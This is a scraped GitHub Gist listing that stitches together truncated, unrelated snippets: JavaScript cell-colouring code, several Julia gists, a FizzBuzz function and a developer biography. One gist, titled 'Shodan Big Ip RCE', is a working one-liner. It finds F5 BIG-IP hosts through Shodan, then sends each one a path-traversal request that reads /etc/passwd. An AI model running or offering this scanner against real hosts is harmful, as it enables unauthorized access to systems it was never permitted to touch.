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Josué Acevedo (Neomatrix) neomatrixcode

Working from home
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var a = (function() {
var _colorear = function() {
var colores = ["red", "blue", "pink", "yellow"];
var celdas_alrededor = function(celda) {
var obj_salida = { "arriba": undefined, "derecha": undefined, "abajo": undefined, "izquierda": undefined };
var indice = celda.cellIndex;
/* Celda de arriba */
if (celda.parentElement.previousElementSibling !== null) {
Ismael-VC / greedy_banner.jl
Last active January 19, 2016 03:07
Greedy Julia banner.
function banner(io::IO = STDOUT)
have_color = Base.have_color
if GIT_VERSION_INFO.tagged_commit
elseif GIT_VERSION_INFO.commit == ""
commit_string = ""
days = Int(floor((ccall(:jl_clock_now, Float64, ()) - GIT_VERSION_INFO.fork_master_timestamp) / (60 * 60 * 24)))
Ismael-VC / dict_macro.jl
Last active April 23, 2017 17:30
Julia macro for Python like dict literals.
module DictMacro
export @dict
@dict {k₁: v₁, k₂: v₂, …, kₙ₋₁: vₙ₋₁, kₙ: vₙ}
Use Python's `dict`, JSON like syntax for `Dict` literals.
Ismael-VC / julia_tan.jl
Created August 17, 2017 04:47
PyCall Julia Discord bot.
#!/usr/bin/env julia
module JuliaTanBot
export julia_tan
using PyCall
@pyimport textwrap
"Levenshtein" => :ok
"ReadStat" => :skipped
"Discretizers" => :fail
"SchumakerSpline" => :fail
"GaussQuadrature" => :fail
"SyntaxTree" => :ok
"Peaks" => :ok
"FredData" => :skipped
"RecurrenceAnalysis" => :ok
"MKLSparse" => :fail
Computer Systems Engineer, with more than 8 years of professional experience. Member of the IEEE Computer Society and the ACM. He has made contributions to free software in addition to being interested in emerging areas of technology.
He learned to program at 16 in programming language C, an event that caused technology to become his biggest hobby. He currently works as an independent software developer and as a university teacher.
Freelancer in software development projects such as web frontend, web backend plus infrastructure in multiple languages ​​and technologies such as codeigniter, Ruby on rails, Django and laravel.
Knowledge in C, D, julia, java, assembler, c ++, c, javascript, perl, python, ruby, r, go, elixir, c, clojure, css, tex, matlab, swift, kotlin.
Database Managers: PostgreSQL, MySQL, MariaDB, MongoDB, RethinkDB
Others: Docker, Kubernetes, Quantum Computing, Blockchain, Graphql, GIT, Vim, React js, Vue js, Ruy on rails, Flask, Artificial Intelligence, Parallel and Distributed Computing, Re
Mad-robot /
Last active January 7, 2024 01:54
Shodan Big Ip RCE
shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done
#sudo apt install curl
#sudo apt install python3-shodan
#shodan init YOUR_API_KEY
niczky12 / fizzbuzz_4.jl
Last active January 25, 2021 20:55
Fizzbuzz 4
function fizzbuzz(n)
numbers = 1:n
# first we convert the numbers to strings
result = string.(numbers)
result[rem.(numbers, 3) .== 0] .= "Fizz"
result[rem.(numbers, 5) .== 0] .= "Buzz"
result[(rem.(numbers, 3) .== 0) .* (rem.(numbers, 5) .== 0)] .= "FizzBuzz"